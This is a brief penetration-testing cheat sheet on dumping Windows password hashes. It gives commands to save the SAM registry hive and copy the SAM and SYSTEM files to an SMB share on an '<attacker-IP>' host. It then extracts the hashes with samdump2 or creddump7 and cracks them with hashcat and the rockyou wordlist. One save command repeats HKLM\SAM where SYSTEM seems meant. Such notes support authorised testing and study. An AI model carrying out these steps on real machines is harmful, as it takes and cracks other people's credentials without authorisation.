528 B
528 B
Powershell
HashDump
save HKLM\SAM C:\Users\Administrator\Desktop\SAM
save HKLM\SAM C:\Users\Administrator\Desktop\System
- Use
samdump2
Extract Hashes
- Extract via smb server on attacker
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
- Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
python pwdump.py SYSTEM SAM
or
hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt